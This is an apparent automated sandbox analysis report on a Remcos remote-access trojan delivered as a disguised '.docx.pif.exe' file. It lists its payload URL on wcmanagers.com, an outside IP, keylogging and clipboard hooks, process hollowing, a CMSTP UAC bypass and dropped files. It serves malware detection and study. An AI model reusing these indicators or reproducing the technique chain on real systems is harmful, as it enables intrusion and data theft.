              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
              Source: xkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, drbdmeyP.pif, drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp, drbdmeyP.pif.0.dr | String found in binary or memory: http://www.pmail.com
              Source: xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: SystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.localP
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com/
              Source: drbdmeyP.pif, 00000003.00000001.1257794553.00000000004CC000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps03
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458A2B8 SetWindowsHookExA 0000000D,0458A2A4,00000000 | 31_2_0458A2B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard | 31_2_0458B70E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045968C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 31_2_045968C1
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard | 31_2_0458B70E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx | 31_2_0458A3E0

              E-Banking Fraud

              Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459C9E2 SystemParametersInfoW | 31_2_0459C9E2
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

              System Summary

              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\colorcpl.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread | 0_2_029981B8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose | 0_2_0299C7B4
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile | 0_2_0299C724
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299A524 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle | 0_2_0299A524
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory | 0_2_02997A94
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299DA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess | 0_2_0299DA24
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose | 0_2_0299C898
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299D9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess | 0_2_0299D9A4
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory | 0_2_02997944
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997E14 LoadLibraryExA,GetModuleHandleA,GetProcAddress,NtFlushInstructionCache,FreeLibrary | 0_2_02997E14
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary | 0_2_02997CC8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029981B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread | 0_2_029981B6
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile | 0_2_0299C6AC
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299C7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose | 0_2_0299C7B2
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory | 0_2_02997A92
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029979D8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory | 0_2_029979D8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02997942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory | 0_2_02997942
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx | 8_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer | 8_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose | 8_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError | 8_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B57898C NtQueryInformationToken | 8_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess | 8_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW | 8_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken | 8_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx | 10_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer | 10_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose | 10_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError | 10_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B57898C NtQueryInformationToken | 10_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess | 10_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW | 10_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken | 10_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx | 12_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer | 12_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose | 12_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError | 12_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B57898C NtQueryInformationToken | 12_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess | 12_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW | 12_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken | 12_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx | 14_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer | 14_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose | 14_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError | 14_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B57898C NtQueryInformationToken | 14_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess | 14_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW | 14_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken | 14_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx | 17_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer | 17_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose | 17_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError | 17_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B57898C NtQueryInformationToken | 17_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess | 17_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW | 17_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken | 17_2_00007FF64B5789E4
              Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A09890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey | 24_2_00007FF7E0A09890
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B565240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z | 8_2_00007FF64B565240
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread | 0_2_029981B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045967B4 ExitWindowsEx,LoadLibraryA,GetProcAddress | 31_2_045967B4
              Source: C:\Users\Public\alpha.exe | File created: C:\Windows
              Source: C:\Users\Public\alpha.exe | File created: C:\Windows \System32
              Source: C:\Windows\System32\extrac32.exe | File created: C:\Windows \System32\per.exe
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029820C4 | 0_2_029820C4
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040E800 | 3_2_0040E800
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040C838 | 3_2_0040C838
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040F1CA | 3_2_0040F1CA
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00411250 | 3_2_00411250
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004102D0 | 3_2_004102D0
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040B2E7 | 3_2_0040B2E7
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004102F0 | 3_2_004102F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004105F0 | 3_2_004105F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00410673 | 3_2_00410673
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004106B9 | 3_2_004106B9
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040E800 | 3_1_0040E800
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040C838 | 3_1_0040C838
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040F1CA | 3_1_0040F1CA
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_00411250 | 3_1_00411250
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004102D0 | 3_1_004102D0
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040B2E7 | 3_1_0040B2E7
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004102F0 | 3_1_004102F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004105F0 | 3_1_004105F0
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_00410673 | 3_1_00410673
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004106B9 | 3_1_004106B9
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B567D30 | 8_2_00007FF64B567D30
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5737D8 | 8_2_00007FF64B5737D8
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56AA54 | 8_2_00007FF64B56AA54
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B575554 | 8_2_00007FF64B575554
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B561884 | 8_2_00007FF64B561884
